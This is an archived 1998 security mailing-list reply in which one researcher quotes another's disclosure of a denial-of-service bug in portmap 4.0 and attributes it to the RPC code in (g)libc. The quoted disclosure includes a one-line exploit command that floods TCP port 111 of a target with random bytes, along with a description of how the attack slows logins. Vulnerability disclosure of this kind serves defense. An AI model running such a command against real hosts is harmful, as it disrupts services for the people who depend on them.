On Wed, 1 Apr 1998, Michal Zalewski wrote: > It's possible to perform DoS attack by sending small amount of junk to > tcp port 111 of machine running portmap 4.0 (and older). Simple exploit > follows (only to send a few random 8-bit chars): > > telnet -E victim.com 111 </dev/random > > It will affect specific operations/services on attacked host, like login - > depending on system speed, login attempt on idle machine (LA=0.01, Linux > 2.0.x, x86) will take from over 10 seconds (k6/200MHz) to long minutes > (486dx/80MHz). During attack, many select() calls will fail (timeout), > so complex programs will become much slower (especially when resolving > domain names :), but LA will not change significally. > > Smarter attacks (without /dev/random) are probably much more effective. This is the very same bug I already reported as 'easy DoS in most RPC apps'. rpc.portmap is one I forgot to check ;) This bug is in (g)libc, I've been discussing it with some rpc developers, they don't see any simple solution... Greetz, Peter. ------------------------------------------------------------------------------ 'Selfishness and separation have led me to . Peter 'Hardbeat' van Dijk to believe that the world is not my problem . network security consultant I am the world. And you are the world.' . (yeah, right...) Live - 10.000 years (peace is now) . peterat_private ------------------------------------------------------------------------------ 10:16pm up 13 days, 19:56, 3 users, load average: 1.02, 0.52, 0.20 ------------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:48:16 PDT